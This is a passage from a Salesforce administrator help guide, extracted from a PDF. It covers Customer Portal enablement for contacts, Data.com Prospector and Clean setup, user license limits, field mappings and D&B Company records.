a Self-Service user can be visible to a partner or Customer Portal user associated with the same contact.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

• You cannot delete an active Customer Portal user; you can only disable or deactivate his or her access to the Customer
Portal.

The following table describes whether you can delete contacts that are associated with portal users:

Can You Delete the Contact?State of Portal User Associated to Contact

No. This is to ensure that the contact is available if you
choose to reactivate the portal user.

Active portal user

No. This is to ensure that the contact is available if you
choose to reactivate the portal user.

Inactive portal user

Yes. Deleted contacts are sent to the Recycle Bin.Disabled portal user

• You can change the account on the contact at any time.
• You can merge contacts enabled to use a Customer Portal.
• The user’s Nickname defaults to his or her email alias unless you specify otherwise. For example, if the user’s Email is

“jsmith@company.com,” the user’s Nickname defaults to “jsmith” when you click Save.
• Delegated administrators can’t assign the High Volume Customer Portal license to contacts.

Tips on Enabling the Customer Portal for Person Accounts

Consider the following when enabling the Customer Portal for person accounts:

• After the person account is enabled, click Manage External User and choose View Customer User on the person account
detail page to view or edit a person account’s access to your Customer Portal.

• You can’t delete a person account enabled to use a Customer Portal.
• You can’t import person accounts to be automatically enabled to use a Customer Portal. For more information on importing

person accounts, see Import My Person Accounts on page 468.
• Person account users can’t self-register for a Customer Portal. When they try to do so, they receive an email notification

that instructs them to contact the portal administrator. See Enabling Customer Portal Login and Settings on page 1943.

1406

Enabling the Customer Portal for Contacts and Person
Accounts

Administering People and Organizations That Users Sell To



• You can't merge person accounts enabled to use a Customer Portal.

See Also:
Social Accounts, Contacts, and Leads Overview
About Customer Portal User Management

LETTING USERS GET NEW ACCOUNTS, CONTACTS, AND LEADS

Implementing Data.com Prospector
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com:

“Manage Users”To enable Data.com users:

“Download AppExchange Packages”To install AppExchange packages:

Implementing Data.com Prospector is easy. Here’s what you need to know.

The free version of Data.com Prospector provides Data.com data to all users. Users can find the Data.com tab on the All Tabs
page, or you can add it for them.

With the free version, users can search across the complete Data.com database of accounts and contacts. Free version users
can’t see phone and email information for contacts, they can’t see account cards or D&B data on account records, and they
can’t add records to Salesforce.

To take full advantage of Data.com’s data, your organization needs to purchase Data.com Prospector licenses and set up the
feature. We offer two versions of the Data.com Prospector product that let you search and add data from Data.com: Data.com
Corporate Prospector and Data.com Premium Prospector. Both are easy to set up, but Data.com Premium Prospector includes
a few additional steps. Some of the steps are the same for both products, so let’s start with those.

To implement Data.com Prospector, you need to:

1. Understand Data.com licenses, limits, and products.
2. Enable users for Data.com, assign type for each user, and assign record addition limits.
3. Add the Data.com tab to user profiles.
4. Install the Data.com Reports AppExchange package.
5. Depending on the version of Data.com Prospector you’re using,, you’ll complete a few more steps. Check out these topics

for complete details.
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Tip: To find out which Data.com Prospector product your organization has, from Setup, click Data.com
Administration > Licenses & Limits. On the Licenses & Limits page, check the Data.com Licenses section.
You’ll see either “Corporate” or “Premium.”

• Configuring Data.com Corporate Prospector
• Configuring Data.com Premium Prospector

If you’re using Data.com Clean along with Data.com Prospector, see Implementing Data.com Clean on page 1427.

Implementation Tips and Best Practices

Note:

If a search produces a large number of results, users won’t see all data past page 10. Contact Salesforce customer
support to enable unlimited view.

• If a user adds more than 200 leads to Salesforce at one time, any lead assignment rules your organization uses won’t run.
To make sure your lead assignment rules run, instruct your users to limit their additions to fewer than 200 leads at any
time.

• If your organization uses validation rules on fields that are mapped to Data.com, either deactivate the rules or make sure
they match Data.com field names to avoid errors when you add records.

See Also:
Data.com Product Suite Overview
Understanding Data.com User Types, Licenses, and Limits

Configuring Data.com Corporate Prospector

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com Corporate Prospector:

Data.com Corporate Prospector provides a basic set of Dun & Bradstreet account and lead data, including D-U-N-S Number,
NAICS Code, Tradestyle, and more. Here’s how to implement this product.

Note: To find out which Data.com Prospector product your organization has, from Setup, click Data.com
Administration > Licenses & Limits. On the Licenses & Limits page, check the Data.com Licenses section. You’ll
see either “Corporate” or “Premium.”

1. Make sure you’ve implemented Data.com.
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2. Enable Data.com Clean so your users can manually clean account, contact, and lead records.
3. Configure your account, contact, and lead page layouts with the buttons and fields you need.
4. If you use Enterprise or Unlimited Editions, you’ll need to update your field-level security so users see fields provided by

D&B.

Best Practices for Your Configuration

If your organization uses either version of Data.com Prospector, and you create validation rules for the fields that the product
provides, those rules will still attempt to run even if you stop using the product, so disable any validation rules using those
fields in that case. Data.com Prospector fields are identified in the help topics “Account Fields” and “Lead Fields”.

Configuring Data.com Premium Prospector

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com Premium Prospector:

Data.com Premium Prospector is an upgrade to Data.com Corporate Prospector. With Premium Prospector, you get all the
features and fields available in Corporate Prospector, plus over 70 additional D&B fields for accounts and leads you add to
Salesforce from Data.com. Like Data.com Corporate Prospector users, Premium Prospector users can also view a limited
number of D&B fields on account and lead records.

Note: To find out which Data.com Prospector product your organization has, from Setup, click Data.com
Administration > Licenses & Limits. On the Licenses & Limits page, check the Data.com Licenses section. You’ll
see either “Corporate” or “Premium.”

Here’s how to configure Data.com Premium Prospector.

1. Make sure you’ve implemented Data.com Prospector.
2. Confirm that Data.com Clean is enabled, so your users can manually clean account, contact, and lead records.
3. Configure your account, contact, and lead page layouts with the buttons and fields you need.
4. If you use Enterprise or Unlimited Editions, you’ll need to update your field-level security so users see fields provided by

D&B.
5. Add the D&B Companies tab to user profiles.
6. (Optional) We’ve created a default layout for D&B Company records, but you may want to use the Enhanced Page Layout

Editor to customize the page layout.

Best Practices for Your Configuration

• You can let your users view and delete D&B Company records. To do this, you’ll assign permissions to standard and
custom profiles.
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For standard profiles, assign the permission Delete D&B Company records in addition to the preassigned permission
Read D&B Company records.

For custom profiles, assign both of the permissions Read D&B Company records and Delete D&B Company
records.

• If your organization uses either version of Data.com Prospector, and you create validation rules for the fields that the
product provides, those rules will still attempt to run even if you stop using the product, so disable any validation rules
using those fields in that case. Data.com Prospector fields are identified in the help topics “Account Fields” and “Lead
Fields”.

See Also:
Data.com Product Suite Overview

Setting Up Data.com Users
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com:

“Manage Users”To enable Data.com users:

“Download AppExchange Packages”To install AppExchange packages:

The All Data.com Users page shows all users, grouped by user type: Data.com User and Data.com List User.

• Data.com Users get a limited number of records to add or export per month, and their unused additions expire at the end
of each month. For each Data.com User, you can see the monthly limit and number of records added to Salesforce or
exported during the month.

• Data.com List users share account, contact, and lead record additions from a pool. You can see the organization’s limit,
and the number of records each Data.com List User has added to Salesforce or exported.

Enable each Data.com user on his or her User Edit page.

1. From Setup, click Manage Users > Users, then click Edit next to the name of the user you want to enable.
2. In the Data.com User Type drop-down, select the user type.
3. For Data.com users, in the Data.com Monthly Addition Limit drop-down, select the number of account, contact,

and lead records the user can add each month. You can select up to the organization limit for any user or all users, but once
the organization's monthly limit is reached, users won't be able to add more records.
For example, if your organization’s monthly addition limit is 3,000 records, you might assign one user a monthly addition
limit of 500 records, another user a limit of 1,000 records, and another user the organization limit (in this case 3,000
records). If the second user adds all 1,000 of his records right away, the third user will only be able to add up to 2,000
records, and depending on how many the third user adds, the first user may not be able to add any records.
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Tip:  You can find your organization's monthly organization addition limit on the Data.com Licenses & Limits
page. From Setup, click Data.com Administration > Licenses & Limits.

4. Click Save to save the current record, or Save and New if you want to enable other users for Data.com.

Tip:  You can also use the Apex Data Loader to enable Data.com users, select the Data.com user type, and set
the monthly addition limit, if applicable. To do so, you export your user records to a .csv file, change the necessary
fields for each user you want to enable, and then import the .csv file into Salesforce. The fields to export from the
User object are LastName, FirstName, UserPermissionsJigsawProspectingUser,
JigsawImportLimitOverride, and UserPreferencesJigsawListUser. For more informations, see the
“SOAP API Developer’s Guide,” or contact salesforce.com support if you need help.

The number of Data.com users you can enable—within Salesforce or via the Data Loader—depends on the number
of Data.com licenses you have purchased. Make sure you stay within that limit when enabling users via the Data
Loader.

See Also:
Data.com Product Suite Overview
Understanding Data.com User Types, Licenses, and Limits

Allowing Duplicate Data.com Records in Salesforce
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Organizations that use a sharing model may want to allow Data.com users to add duplicate account, contact, or lead records
to Salesforce. There are several things to keep in mind when setting your duplicate preferences.

• Records are considered duplicates when they have the same Data.com ID number in the Data.com Key field.

• Duplicates can only be allowed, by object, for the entire organization, not for individual users. If, however, you want to
prevent a user from being able to add duplicates, you can create a trigger.

• Records that are already in Salesforce are marked with an icon ( ) in the search results and can be re-added by any Data.com
user.

• When a record is added as a duplicate, it will not be counted against the user’s monthly record addition limit. Adding a
record only counts against a user’s monthly addition limit the first time it’s added to Salesforce.

To set up your duplicate preferences, follow these steps.

1. From Setup, click Data.com Administration > Preferences.
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2. In the Duplicate Preferences section of the page, select which objects you want to allow duplicates for (accounts, contacts,
or leads).

See Also:
Implementing Data.com Prospector

Limiting What Users Can Do with Data.com Search Results
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com:

To limit what users can do with Data.com search results, you can remove the Add to Salesforce and Export Results buttons
from the Find Contacts and Find Accounts tabs.

1. From Setup, click Data.com Administration > Preferences.
2. In the Button Preferences section of the page, deselect what you want to remove from the Find Contacts and Find Accounts

tabs.

Understanding Data.com-to-Salesforce Custom Field
Mapping

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Create custom mappings from Data.com fields to Salesforce account, contact, and lead fields to get Data.com values in the
Salesforce fields where you want them. Not all Data.com fields are available for all Salesforce fields. To be mappable, the new
Salesforce field must be the same data type as the default field. For example, the Description field can be mapped to a long
text area field with 1,000 characters or more.

Custom field mappings apply when:

• Data.com records are added to Salesforce

• Salesforce records are matched with Data.com records and cleaned either manually or with automated jobs

Before you map fields, make sure you understand these potential outcomes and the related actions you should take.

1412

Limiting What Users Can Do with Data.com Search ResultsLetting Users Get New Accounts, Contacts, and Leads



• Mapping fields or updating mappings forces a full sync with Data.com: all records of enabled CRM objects (accounts,
contacts, and leads) are updated, even if no records have changed.

• Data.com field mappings may conflict with any Salesforce field customizations (such as approvals, workflow rules, or Apex
triggers) you use for accounts, contacts, or leads. Review and edit your customizations as needed so they will work with
the values supplied by your mappings.

• You can skip mapping individual Data.com fields, but values for skipped fields won't be added, exported, or considered
when we calculate a record’s clean status.

• Skipping or changing mappings for fields used to match Salesforce and Data.com records may change some records’ clean
status to Not Found.

• For account records, skipping or changing the mapping for the D-U-N-S Number field will cause all account jobs to use
the Data.com matching service, rather than the D-U-N-S Number field, to rematch account records.

• If you export Data.com search results, the column headers in your Excel file will show the mapped field names. For example,
if you map the Data.com Phone field to the Contact object’s Mobile field, you’ll see a header called “Mobile” for contacts,
not “Phone”.

• If you map Data.com fields that do not have values, some Salesforce records might revert to Not Found clean status.

• If you map a Data.com field to a custom Salesforce field, the custom field’s label will appear on the Clean comparison
page.

• If you want to track changes to field mappings, you’ll find them in the Setup Audit Trail. From Setup, click Security
Controls > View Setup Audit Trail.

See Also:
Default Data.com-to-Salesforce Field Mappings
Customizing Data.com-to-Salesforce Field Mappings

Customizing Data.com-to-Salesforce Field Mappings
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com:

“Manage Users”To enable Data.com users:

“Download AppExchange Packages”To install AppExchange packages:

Before you begin, make sure you understand how mapping works, what preparations to make, and what kind of results you
should expect.

1. From Setup, click Data.com Administration > Field Mapping.
2. For each Data.com field you want to map, select a Salesforce field. If you don’t want to map a field, select Skip Mapping.
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Note: Not all Data.com fields are available for all Salesforce fields. To be mappable, the new Salesforce field must
be the same data type as the default field. For example, the Description field can be mapped to a long text area
field with 1,000 characters or more.

Custom field mappings apply when:

• Data.com records are added to Salesforce
• Salesforce records are matched with Data.com records and cleaned either manually or with automated jobs

See Also:
Default Data.com-to-Salesforce Field Mappings
Customizing Data.com-to-Salesforce Field Mappings

Default Data.com-to-Salesforce Field Mappings
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

If you use Data.com Premium Prospector or Data.com Premium Clean, you have access to D&B Company records, which
include over 70 fields from Dun & Bradstreet (D&B). Several of those D&B fields are also available on accounts, contacts,
and lead records but sometimes with a different field name. This topic details the default field mappings between Data.com’s
D&B fields and Salesforce account, contact, and lead fields.

System administrators can set up custom field mappings.

Accounts

Account FieldD&B Field

Annual RevenueAnnual Sales Volume

DescriptionCompany Description

D-U-N-S NumberD-U-N-S Number

FaxFacsimile Number

Account SiteLocation Type

Shipping AddressMailing Address

EmployeesNumber of Employees–Total

OwnershipOwnership Type Indicator

Billing AddressPrimary Address

Account NamePrimary Business Name

NAICS CodePrimary NAICS Code
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Account FieldD&B Field

NAICS DescriptionPrimary NAICS Description

SIC CodePrimary SIC Code

SIC DescriptionPrimary SIC Description

TradestylePrimary Tradestyle

PhoneTelephone Number

Ticker SymbolTicker Symbol

WebsiteURL

Year StartedYear Started

Contacts

Contact FieldD&B Field

Mailing AddressPrimary Address

Account NamePrimary Business Name

Leads

Lead FieldD&B Field

Annual RevenueAnnual Sales Volume

DescriptionCompany Description

Company D-U-N-S NumberD-U-N-S Number

No. of EmployeesNumber of Employees–Total

AddressPrimary Address

CompanyPrimary Business Name

See Also:
Understanding Data.com Industry Mapping
Customizing Data.com-to-Salesforce Field Mappings
Default Data.com-to-Salesforce Field Mappings
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Data.com Clean Enablement for Data.com Prospector
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To enable or disable Data.com Clean:

Data.com Prospector lets users manually clean Salesforce account, contact, and lead records—regardless of whether they were
added from Data.com. If you use Data.com Prospector, Clean is automatically enabled for you so your users can manually
clean their records. If you use the Data.com Premium Prospector version of the product, your users can also manually clean
D&B Company records that are linked to account or lead records.

Note:

• If you’ve purchased Data.com Clean, you can clean account, contact, and lead records manually and with automated
jobs. If you’ve purchased the Data.com Premium Clean version of the product, you can also use automated jobs
to clean D&B Company records that are linked to account or lead records. For complete details, see Implementing
Data.com Clean.

• Enabling Clean does not clean your records immediately, and you can click Disable to turn the feature off.

1. From Setup, click Data.com Administration > Clean > Settings
2. Confirm that Data.com Clean is enabled.

See Also:
Data.com Clean Overview
Implementing Data.com Clean
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Using Clean features from Jigsaw for Salesforce
Available in: Developer, Enterprise, Professional, and Unlimited Editions

User Permissions Needed

“Edit” on accountsTo clean account records:

“Edit” on contactsTo clean contact records:

“Edit on leadsTo clean lead records:

Important: Jigsaw for Salesforce is no longer available for new organizations and will be retired for existing
organizations in Summer ’14. If you use Jigsaw for Salesforce, you’ll need to uninstall it and migrate to the equivalent
Data.com products that are built in to Salesforce (Data.com Corporate Prospector or Data.com Premium Prospector
and Data.com Clean). For information about migrating, contact your Salesforce account manager. You should not
attempt to migrate to any of the built-in Data.com products without having first purchased them through your
Salesforce account manager.

If you use Data.com for prospecting in Jigsaw for Salesforce, but use the Jigsaw for Salesforce AppExchange package to clean
your records, follow the instructions in Using Data.com Clean in Salesforce to clean your account, contact, and lead records.

For instructions on setting up Jigsaw for Salesforce, see Jigsaw for Salesforce Configuration Guide.

See Also:
Data.com Clean Overview

Uninstalling Jigsaw for Salesforce
Available in: Developer, Enterprise, Professional, and Unlimited Editions

User Permissions Needed

“Download AppExchange Packages” AND “Customize
Application”

To uninstall packages

Important: Jigsaw for Salesforce is no longer available for new organizations and will be retired for existing
organizations in Summer ’14. If you use Jigsaw for Salesforce, you’ll need to uninstall it and migrate to the equivalent
Data.com products that are built in to Salesforce (Data.com Corporate Prospector or Data.com Premium Prospector
and Data.com Clean). For information about migrating, contact your Salesforce account manager. You should not
attempt to migrate to any of the built-in Data.com products without having first purchased them through your
Salesforce account manager.
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To uninstall Jigsaw for Salesforce, follow the instructions in the Jigsaw for Salesforce Uninstall Guide.

See Also:
Data.com Product Suite Overview

Understanding Data.com User Types, Licenses, and Limits
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

The Data.com Licenses & Limits page identifies the type and number of Data.com Prospector user licenses you have, and
the limits per user and for your organization. Limits are listed by user type: Data.com User and Data.com List User. Assign
monthly record additions on the User Edit page for each user.

The Licenses & Limits page also provides information about your organization’s Clean implementation.

Data.com Prospector Licenses

Data.com Prospector user licenses let users search Data.com for accounts and contacts, and add them as records to Salesforce.
Users can also add contacts as leads.

There are two versions of Data.com Prospector available: Corporate Prospector and Premium Prospector. They differ based
on the D&B fields that are included when you add account or lead records to Salesforce. Both versions of the product include
a basic set of D&B fields , including D-U-N-S Number, NAICS Code, and NAICS Description. Data.com Premium
Prospector also includes over 70 additional D&B fields on D&B Company records. (D&B Company records are linked to
accounts and leads that are added to Salesforce from Data.com.) To find out which Data.com Prospector product your
organization has, from Setup, click Data.com Administration > Licenses & Limits. On the Licenses & Limits page, check
the Data.com Licenses section. You’ll see either “Corporate” or “Premium.”

DefinitionField

The total number of Data.com Prospector user licenses your organization has purchased from Salesforce.Number of
Licenses

The number of Data.com Prospector user licenses you've assigned. A single Data.com Prospector license
is assigned every time you enable a user for Data.com Prospector.

Assigned

Tip:  To see which users have been enabled, check the All Data.com Users page. From Setup,
click Data.com Administration > Users.

Data.com User Limits (Monthly)
Data.com Users get a limited number of records to add or export per month, and their unused additions expire at the end of
each month. For each Data.com User, you can see the monthly limit and number of records added to Salesforce or exported
during the month. Only Data.com Users can draw from the organization’s monthly limit. If a Data.com List user wants to
draw from the monthly limit, you need to change that user to a Data.com User.
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DefinitionField

The number of records a single Data.com User can add or export.

The default number of records per license is 300, but it can be adjusted based on your agreement.
Additions expire at the end of each month, as determined by your organization’s default time zone.

Default
Per-User
Record Limit

The total number of records your organization can add or export each month.

This limit is calculated by multiplying the number of Data.com Prospector licenses you have by the
monthly limit per user license.

Organization
Limit

Typically, you distribute record limits among a number of users within your organization, but you can
also assign them all to a single user.

The number of records Data.com Users can still add or export during the current month. The balance
is updated every time a user adds records to Salesforce or exports records from Data.com. Additions
expire at the end of each month, as determined by your organization’s default time zone.

(month)
Balance

Tip:  To see how many records each user has added or exported, check the All Data.com Users
page. From Setup, click Data.com Administration > Users. Or, if your organization has access
to custom report types, you can use the Data.com Usage object to create a report that shows
more detailed usage information.

Here’s an example of how an organization manages Data.com User licenses and limits. The sales division of Universal Telco
has 14 sales reps, and they purchase 20 Data.com Prospector licenses, each of which has a record addition limit of 300. This
means that Data.com Users within the organization can add as many as 6,000 records per month. The Universal Telco
administrator distributes the Data.com Users’ monthly record addition limits as follows.

• Ten of the sales reps have limits of 300 each.
• Two of the sales reps have limits of 500 each.
• Two of the sales reps have a limit of 1,000 each.

Data.com List User Limits
Data.com List users share account, contact, and lead record additions from a pool. You can see the organization’s limit, and
the number of records each Data.com List User has added to Salesforce or exported. Only Data.com List Users can draw from
the organization’s pool limit. If a Data.com User wants to draw from the organization’s pool limit, you need to change that
user to a Data.com List User.

DefinitionField

The total number of records your organization’s Data.com List Users can add or export. All Data.com
List Users work from this limit, so if one Data.com List User reaches the limit, other users of that type
will not be able to add records.

Pool Record
Limit

The number of records Data.com List Users can still add. The balance is updated every time a user
adds records to Salesforce or exports records from Data.com.

Balance

Tip:  To see how many records each user has added or exported, check the All Data.com
Data.com Users page. From Setup, click Data.com Administration > Users. Or, if your
organization has access to custom report types, you can use the Data.com Usage object to create
a report that shows more detailed usage information.
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Here’s an example of how an organization manages Data.com List User licenses and limits. The marketing division of Universal
Telco has four marketing reps. Each rep has a Data.com Prospector license and each is a Data.com List User. Universal Telco
purchases a record addition pool of 5,000 records. This means that together, all four marketing reps can add 5,000 records.
One rep might add 2,500 records, leaving 2,500 to be added by one or more of the other three users.

Data.com Clean

The Data.com Licenses & Limits page also provides information about your organization’s Clean capabilities and
implementation.

If your organization uses Data.com Prospector, users with those licenses can manually clean the account, contact, and lead
records they have access to.

If your organization has purchased a Data.com Clean product, you can also run automated jobs to clean records, and all
Salesforce users (not just those with aData.com Prospector licenses) can manually clean records.

DefinitionField

Which of your Salesforce users can manually clean records. If you’ve purchased Data.com Clean, all
Salesforce users can clean records. If you’ve purchased only Data.com Prospector, only users with licenses
can clean records.

Available To

The availability of automated clean jobs for your organization. If you’ve purchased Data.com Clean but
haven’t yet scheduled clean jobs, from Setup, click Data.com Administration > Clean > Jobs. If you
haven’t purchased Data.com Clean, click the Learn More... link to get product details.

Automation

See Also:
Using Data.com FAQ
Setting Up Data.com Users

Respecting Do-Not-Contact Settings in Data.com Search
Results and Exports

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com:

In Data.com search results and export files, you can mask out or remove email and phone values for contact and lead records
already in Salesforce that have Do Not Call or Email Opt Out selected.

For example: You have a lead record in Salesforce for Sally Larkin and on that record the Do Not Call checkbox is selected.
You search for Sally Larkin as a contact on the Data.com tab and her record appears in the search results list, marked as already
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in Salesforce ( ). The Phone field is masked in the search results list, and also on Sally’s contact card. If you export the record,
its Phone field is blank in the .csv file.

1. From Setup, click Data.com Administration > Preferences.
2. Select the Respect Do-Not-Contact Settings checkbox.

For records that have Do Not Call or Email Opt Out selected, Phone or Email field values are masked in the search
results and on the Contact Card, and blank in .csv files created when you export records.

See Also:
Guidelines for Exporting and Importing Data.com Records
Exporting Data.com Contact Records

Administering Data.com FAQ
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

• How do I know which Data.com product my organization has?

• What product should my organization use to clean our account, contact, and lead records?

• What should I do if my Data.com Users reach their addition limits and we need more prospecting capacity? on page 1422

• Can I prevent Data.com Clean jobs from automatically updating records?

See Also:
Data.com Product Suite Overview

How do I know which Data.com product my organization has?
You can find out by going to the Data.com Licenses & Limits page. From Setup, click Data.com Administration > Licenses
& Limits. If your organization has purchased Data.com Corporate Prospector, you’ll see “Corporate” in the heading for this
section of the page. If your organization has purchased Data.com Premium Prospector, you’ll see “Premium” in the heading.

See Also:
Data.com Clean Overview
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What product should my organization use to clean our account, contact,
and lead records?

You have a number of options. For complete details on the Data.com product suite and to learn about the clean options each
one provides, check out Data.com Product Suite Overview and Data.com Clean Overview on page 1426.

Contact salesforce.com support if you need assistance getting Clean for your organization.

See Also:
Data.com Clean Overview

What should I do if my Data.com Users reach their addition limits and we
need more prospecting capacity?

If you need to purchase additional licenses for Data.com Users, contact your salesforce.com account executive.

See Also:
Understanding Data.com User Types, Licenses, and Limits

Can I prevent Data.com Clean jobs from automatically updating records?
You sure can. We provide this feature via the Data.com Reports AppExchange package. Just follow these guidelines to download
the package and select the records you don’t want to be updated.

See Also:
Data.com Clean Overview
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LETTING USERS GET EXPANDED DATA FOR ACCOUNTS AND
LEADS

Implementing D&B Companies
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement D&B Companies:

If your organization has purchased Data.com Premium Prospector or Data.com Premium Clean, you have access to the D&B
Companies object, which provides D&B data for accounts and leads you add to Salesforce. Cleaning an account or lead record,
either manually or via automated jobs, also creates a D&B Company record if you don’t yet have one in Salesforce.

The D&B Companies tab lists all the D&B Company records you have in Salesforce.

Each D&B Company record displays a large set of D&B fields. If you’ve purchased Data.com Premium Clean, you can also
use automated jobs to clean D&B Company records. Cleaning a D&B Company record automatically fills blank fields and
overwrites old data with new.

Setting up D&B Companies is easy to do—just follow the steps for configuring Data.com Premium Prospector, and keep
these guidelines in mind.

Tip: To find out which Data.com Prospector product your organization has, from Setup, click Data.com
Administration > Licenses & Limits. On the Licenses & Limits page, check the Data.com Licenses section. You’ll
see either “Corporate” or “Premium.”

Implementation Guidelines

• Make sure you add the D&B Companies tab to user profiles.
• If you use the Data.com Clean product and want to automatically update D&B Company records, define that preference.
• The D&B fields that also exist on the account object (such as D-U-N-S Number, SIC Code, and NAICS Code) are

managed fields, and they are updated by both manual and automated clean processes. Automated clean jobs are available
if you use the Data.com Clean product.

• Because the D&B Company object is read-only (except for Data.com Clean updates), you can’t create task and field update
workflow rules for it.  Rules that are triggered by D&B field changes that act on other objects are permitted, however. For
example, you can create a workflow rule that updates a custom field on an account record when a D&B Company record
is created.
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• You can enable users to view and delete D&B Company records by assigning the appropriate profile permissions. Standard
profiles automatically have the Read D&B Company records permission, but need to be assigned the Delete D&B
Company records permission. Custom profiles need to be assigned both permissions.

See Also:
D&B Companies Overview

Maintaining Linked Salesforce and D&B Company Records
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To enable deletion of D&B Company records:

If you use Data.com Premium Prospector or Data.com Premium Clean, you have access to over 70 additional D&B fields on
the D&B Company record. When an account or lead record is added to Salesforce, a D&B Company record is automatically
created and linked to that account via the record’s D&B Company field. Cleaning an account or lead record, either manually
or via automated jobs, also creates a D&B Company record if you don’t yet have one in Salesforce If you delete an account or
lead, you might also want to delete the D&B Company record.

Important: Because the D&B Company field is editable on account and lead records, more than one account might
end up associated to a single D&B Company record. We recommend that you do not delete D&B Company records
that are associated to more than one account or lead record.

System administrators are enabled by default to delete D&B Company records, but if you need to enable other users to delete
these records, you must first create a permission set that allows them to.

See Also:
D&B Companies Overview
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Creating a Permission Set for Deleting D&B Company
Records

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement D&B Companies:

“Manage Users”To create permission sets:

System administrators are enabled by default to delete D&B Company records, but if you need to enable other users to delete
these records, you must first create a permission set that allows them to.

1. From Setup, click Manage Users > Permission Sets.
2. Click New.
3. In the Label field, enter a name related to the permission you’re granting. For example: D&B Company Delete. In

the User License field, select Salesforce. Click Save.
4. On the permission set’s overview page, click App Permissions.
5. On the App Permissions page, click Edit, then select Delete D&B Company records. Because the Read D&B

Company records permission is also required before you can delete D&B Company records, that permission’s checkbox
is selected automatically.

6. Click Save.
A Delete button now appears on all D&B Company records.

See Also:
Deleting D&B Company Records
Creating a Permission Set for Deleting D&B Company Records
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Deleting D&B Company Records
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Read D&B Company records” AND

“Delete D&B Company records”

To delete D&B Company records:

If you use Data.com Premium Prospector or Data.com Premium Clean, you have access to over 70 additional D&B fields on
the D&B Company record. When an account or lead record is added to Salesforce, a D&B Company record is automatically
created and linked to that account via the record’s D&B Company field. Cleaning an account or lead record, either manually
or via automated jobs, also creates a D&B Company record if you don’t yet have one in Salesforce If you delete an account or
lead, you might also want to delete the D&B Company record.

1. If you need to, create a permission set to allow you to delete D&B Company records.
2. Open the D&B record you want to delete and click Delete.

See Also:
Maintaining Linked Salesforce and D&B Company Records
Creating a Permission Set for Deleting D&B Company Records

LETTING YOUR ORGANIZATION CLEAN CRM RECORDS

Data.com Clean Overview
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Data.com Clean is an important part of the Salesforce Data.com product suite, offering both manual and automated cleaning
for your account, contact, and lead records. Data.com Clean provides full clean capability for your organization: all Data.com
Clean users can manually clean Salesforce accounts, contacts, and leads, and you can configure jobs to flag field value differences
on Salesforce records or automatically fill blank fields. Data.com Clean does not support person accounts.
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Clean works by comparing your Salesforce account, contact, and lead records with records from Data.com, linking records
that match, and providing clean status information on the Salesforce record. You can choose to implement Clean for accounts,
contacts, and leads, and specify whether the clean process will flag differences between the two records, or also auto-fill blank
Salesforce fields with Data.com values.

Licensed Data.com Prospector users can also clean individual records manually, comparing their fields and values side by side
with those from the linked Data.com record. Metrics and analytics provide detailed information about the value of Data.com
Clean to your organization: see how many of your Salesforce records are matched to Data.com records, and how many have
been updated by manual and automated clean processes.

See Also:
Data.com FAQs
Cleaning Records Manually with Data.com Clean
Data.com Clean Product Enablement
Analyzing Data Quality with Data.com Data Assessments
Data.com Social Key Overview—Beta

Implementing Data.com Clean
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”To implement Data.com Clean:

